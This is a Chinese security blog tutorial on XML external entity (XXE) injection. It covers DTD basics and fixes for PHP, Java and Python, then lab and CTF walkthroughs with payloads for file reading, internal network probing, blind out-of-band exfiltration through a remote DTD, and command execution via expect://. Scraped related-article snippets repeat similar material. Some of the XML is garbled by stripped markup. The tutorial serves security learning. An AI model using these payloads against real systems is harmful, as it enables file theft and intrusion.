etree解析xml_WEB漏洞 XML & XXE漏洞

最新推荐文章于 2024-01-29 17:51:49 发布
最新推荐文章于 2024-01-29 17:51:49 发布
阅读量263 收藏
点赞数
文章标签: etree解析xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30978239/article/details/112532205
版权

20d1608721e380005eaa314ffd723f0a.png

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。

XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

XML 与 HTML 的主要差异XML 被设计为传输和存储数据,其焦点是数据的内容。HTML 被设计用来显示数据,其焦点是数据的外观。HTML 旨在显示信息 ,而 XML 旨在传输信息。<?xml version="1.0"?>                   ]]]><note><to>Daveto><from>Tomfrom><head>Reminderhead><body>You are a good manbody>note>#DTD文档类型定义(DTD)可定义合法的XML文档构建模块它使用一系列合法的元素来定义文档的结构DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用(1)内部的 DOCTYPE 声明元素声明]>(2)外部文档声明文件名”>#DTD实体(1)内部实体声明<!ENTITY 实体名称 ”实体的值”>(2)外部实体声明<!ENTITY 实体名称 SYSTEM ”URI”>(3)参数实体声明<!ENTITY %实体名称 ”实体的值”><!ENTITY %实体名称 SYSTEM ”URI”>#xxe漏洞修复与防御方案-php,java,python-过滤及禁用#方案1-禁用外部实体PHP:libxml_disable_entity_loader(true);JAVA:DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);Python:from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))#方案2-过滤用户提交的XML数据过滤关键词:!ENTITY,或者SYSTEM和PUBLIC

  • pikachu靶场xml数据传输测试-回显,玩法,协议,引入

d5b668838f8d7db639d4d823feb9b7a3.png

#玩法-读文件<?xml version = "1.0"?>    ]><x>&xxe;x>

cabe7c6eeae708293b81b21fa92876d6.png

#玩法-内网探针或攻击内网应用(触发漏洞地址)<?xml version="1.0" encoding="UTF-8"?>         ]><x>&rabbit;x>

e68278f9ee31d87fc0546c5c1426f92b.png

#引入外部实体dtd<?xml version="1.0" ?>        %file;]><x>&send;x>evil2.dtd:<!ENTITY send SYSTEM "file:///f://payload.txt">

46a84a80d2c0c549fddb5edcefb23efa.png

#无回显-读取文件xml version="1.0"?>"php://filter/read=convert.base64-encode/resource=test.txt">"http://192.168.18.74/test.dtd">%dtd;%send;]>test.dtd:  ""> %payload;#协议-读文件(绕过)参考:https://www.cnblogs.com/20175211lyz/p/11413335.htmlxml version = "1.0"?> "php://filter/read=convert.base64-encode/resource=xxe.php"> ]> &f;#玩法-RCE该CASE是在安装expect扩展的PHP环境里执行系统命令xml version = "1.0"?>    "expect://id" >]>&xxe;

  • xxe-lab靶场登陆框xml数据传输测试-检测发现

burp抓包 分析数据包   可判断的类型为xml

1.提交的数据包含XML格式如:<forgot><username>adminusername>forgot>2.请求头中如:Content-Type:text/xml或Content-type:application/xml

f912c027c0084c64b8e798fc3e50f775.png

注入代码

12e92827e2d9e7757ea930c812586ee0.png

  • CTF-Jarvis-OJ-Web-XXE安全真题复现-数据请求格式

http://web.jarvisoj.com:9882/更改请求数据格式:application/xml<?xml version = "1.0"?>    ]><x>&f;x>

4cb0179b66c1a6493885e3431525d337.png

  • xxe安全漏洞自动化注射脚本工具-XXEinjector(Ruby)

https://github.com/enjoiz/XXEinjector

git clone https://github.com/enjoiz/XXEinjector.git

65baecd7e334e72a4e80f70047039130.png

参考链接:

https://cnblogs.com/bmjoker/p/9614990.html

d4b342ff902092e2f041b4c65644a0b8.png

夏勇兴
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dom4j-xml-injection:dom4j xml注入漏洞的概念证明
04-29
dom4j-xml-注入 这是概念证明,显示了dom4j上的XML注入漏洞。 该项目具有三个子模块,除了dom4j版本外,这些子模块相同。 易受攻击的模块使用2.1.0,安全模块使用2.1.1,旧版模块使用1.6。 所有模块均具有描述该漏洞的相同测试。 该测试在易受攻击的模块和旧版模块上变为绿色,但在安全模块上失败。 要检查生成的XML文件中是否存在易受攻击的模块,只需在./vulnerable-version/output.xml查找输出文件./vulnerable-version/output.xml 要检查所生成的旧模块的XML文件,只需在./vulnerable-version/output.xml查找输出文件。
WEB 漏洞-XXE&XML 之利用检测绕过
硫酸超的博客
08-29 788
WEB 漏洞-XXE&amp;XML 之利用检测绕过XXE&amp;XMLDTD内部的 DOCTYPE 声明外部DOCTYPE声明内部实体声明外部实体声明为什么使用 DTDpikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入回显玩法-读文件玩法-内网探针或攻击内网应用(触发漏洞地址)引入外部实体 dtd不回显读取文件xxe-lab 靶场登陆框 xml 数据传输测试-检测发现CTF-Vulnhub-XXE 安全真题复现-检测,利用,拓展,实战CTF-Jarvis-OJ-Web-XXE 安全真题复
CTF | bugku | 秋名山车神
diemaoye6838的博客
09-07 1018
''' @Modify Time @Author ------------ ------- 2019/8/31 19:55 laoalo ''' import requests from lxml import etree ''' eval():将字符串str当成有效的表达式来求值并返回计算结果 ''' url =...
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 1179
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXEXML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
WEB漏洞-XXE&XML之利用检测绕过全解
xhscxj的博客
02-07 1593
xml基础概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 ...
第39天:WEB漏洞-XXE&amp;XML之利用检测绕过全解1
08-03
总结来说,XXE漏洞是由于XML解析器处理不当引起的,可能导致敏感数据泄露、内网扫描和命令执行等严重后果。因此,开发者应确保正确配置和限制XML解析器,避免使用不受信任的XML输入,并实施输入验证和过滤机制,以...
能够解析XML的程序.rar_XML 解析_xml_解析xml
09-14
import xml.etree.ElementTree as ET def parse_xml(file_name): tree = ET.parse(file_name) root = tree.getroot() # 遍历并处理XML元素 for child in root: process_element(child) def process_element...
SCAN_XXE:利用XML XXE漏洞
05-07
XXE漏洞主要源于不当配置的XML解析器,允许解析外部实体。当应用接受并处理不受信任的XML输入时,攻击者可以通过构造恶意的XML文档来触发XXE。例如,他们可能会定义一个外部实体来引用服务器上的敏感文件(如`file:/...
xml.rar_xml_xml 转 富文本_读取xml_读取解析XML
09-20
1. **解析XML**:使用XML解析器(如Python的`xml.etree.ElementTree`库或Java的`javax.xml.parsers.DocumentBuilderFactory`)将XML字符串或文件转换为可操作的对象结构。 2. **遍历元素树**:遍历解析后的元素树,...
xml.zip_XML 解析_XML解析_xml linux
09-21
5. **Python解析**:Python有许多内置的XML处理库,如`xml.etree.ElementTree`,它提供了简洁的API来解析和操作XML。 压缩包中的`IpCamXml_Codec.cpp`和`IpCamXml_Codec.h`文件可能是用于处理IP摄像头XML数据的编码...
XXE的利用手法及绕过
最新发布
qq_36334672的博客
01-29 180
当目标运行我们引用外部实体时,可通过构造恶意数据,执行任意文件读取,内网端口探测,攻击内网,甚至命令执行——安装了expect扩展。XXE主要由DTD文档构成,因此先介绍DTD,如下所示红色部分为DTD1、开头必须声明为XML <?2、第二行为例如 <!DOCTYPE NOTE //声明此文档为NOTE类型DOCTYPE ANY //也可以为ANYDOCTYPE ROOT //ROOT之类3、DTD有内外引用两种方式1)内部的 DOCTYPE 声明2)外部文档声明。
XXE&XML之利用检测绕过
weixin_52221158的博客
08-27 1421
XML被设计为传输和存储数据,XML文档结构包括XML声明,DTD文档类型定义(可选),文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
xxe编码绕过(8-19)
Realiy的博客
08-19 1691
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
XXE&XML利用检测绕过漏洞
qq_49714982的博客
08-28 148
XML:传输和储存格式类型XXE:XML漏洞注入全称(xml external entity injection)
WEB漏洞-XXE&XML之利用检测绕过
Rnan_prince的博客
07-28 1402
什么是XML?参考文档 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。 XML与HTML对比 XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设计为显示数据,其焦点是数据的外观。 XML旨在传输信息,HTML旨在传输信息。 Xml典型代码: <!--XML声明--> <?xml version="1.0"?> <!-..
XML指南——XML CDATA
ξσ Dicky's Blog σξ
04-15 2172
XML文档中的所有文本都会被解析解析。只有在CDATA部件之内的文本会被解析器忽略。解析数据XML 解析器通常情况下会处理XML文档中的所有文本。当XML元素被解析的时候,XML元素内部的文本也会被解析:This text is also parsedXML解析器这样做的原因是XML元素内部可能还包含了别的元素,象下面的例子,name元素内部包含了first和last两个元素:BillGate
第39天-WEB 漏洞-XXE&XML 之利用检测绕过全解
MCTSOG的博客
03-31 1290
文章目录思维导图基础知识XMLXXEXML 与 HTML 的主要差异DTDDTD 实体XXE 漏洞修复与防御方案-php,java,python-过滤及禁用方案 1-禁用外部实体方案 2-过滤用户提交的 XML 数据涉及案例:pikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入玩法-读文件玩法-内网探针或攻击内网应用(触发漏洞地址)玩法-RCE引入外部实体 dtd无回显-读取文件evil2.dtdxxe-lab 靶场登陆框 xml 数据传输测试-检测发现CTF-Vulnhub-XXE 安全真题
XXE(外部实体注入漏洞)
dinghuan2011的专栏
09-11 3903
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/zhangxing52077/article/details/80932730 1.场景还原    近日,微信发来警告通知,告知平台微信支付可能存在XXE(外部实体注入漏洞),笔者根据微信官方技术文档及时修复了该漏洞,分享出来希望能够对大伙有所帮助 2.原因分析   所谓的外部实体注入漏洞,主...
Python解析XML全攻略:ElementTree模块实战
XMLWeb开发中扮演着重要角色,学习XML解析对于开发者来说至关重要。 Python中解析XML的常见库包括: 1. xml.dom:遵循W3C DOM API,但整个XML文档会被加载到内存,适用于小型文档。 2. xml.dom.minidom:DOM API...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值